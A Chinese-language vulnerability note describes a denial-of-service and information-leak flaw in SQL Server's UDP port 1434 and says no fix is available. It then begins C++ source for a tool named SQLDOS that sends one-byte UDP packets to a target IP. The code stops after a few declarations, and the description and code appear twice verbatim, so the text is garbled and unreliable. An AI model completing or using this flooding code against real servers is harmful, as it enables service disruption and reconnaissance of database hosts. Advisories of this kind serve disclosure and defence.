漏洞描述:
由于SQL Server对1434端口的UDP没有限制,构造特殊的UDP包,SQL Server就一定会作出回应。如果收到大量的这些UDP包,SQL Server将消耗CPU,来处理这些UDP回应,虽然这不能造成主机当机等严重影响,但是CPU使用率将很容易达到100%,从而造成数据库服务器负荷加重,对其他服务(比如WEB)能造成拒绝服务。同时,恶意攻击者只需要对SQL Server发送一个1个字节的UDP数据,SQL Server将到处发送自己的数据库服务器信息。
解决办法:
暂时没有
测试程序:
// SQLDOS.cpp
//
//
// SQLDOS by refdom
//
// Author: refdom.
// Email: refdom@263.net
//
#include "stdafx.h"
#include <string.h>
#include <stdio.h>
void sendudp (void* v)
{
int i;
char buf[1]={'/x02'};
SOCKADDR_IN addr_in;
char *targetip;
targetip=(char*)v;
SOCKET sock;
由于SQL Server对1434端口的UDP没有限制,构造特殊的UDP包,SQL Server就一定会作出回应。如果收到大量的这些UDP包,SQL Server将消耗CPU,来处理这些UDP回应,虽然这不能造成主机当机等严重影响,但是CPU使用率将很容易达到100%,从而造成数据库服务器负荷加重,对其他服务(比如WEB)能造成拒绝服务。同时,恶意攻击者只需要对SQL Server发送一个1个字节的UDP数据,SQL Server将到处发送自己的数据库服务器信息。
解决办法:
暂时没有
测试程序:
// SQLDOS.cpp
//
//
// SQLDOS by refdom
//
// Author: refdom.
// Email: refdom@263.net
//
#include "stdafx.h"
#include <string.h>
#include <stdio.h>
void sendudp (void* v)
{
int i;
char buf[1]={'/x02'};
SOCKADDR_IN addr_in;
char *targetip;
targetip=(char*)v;
SOCKET sock;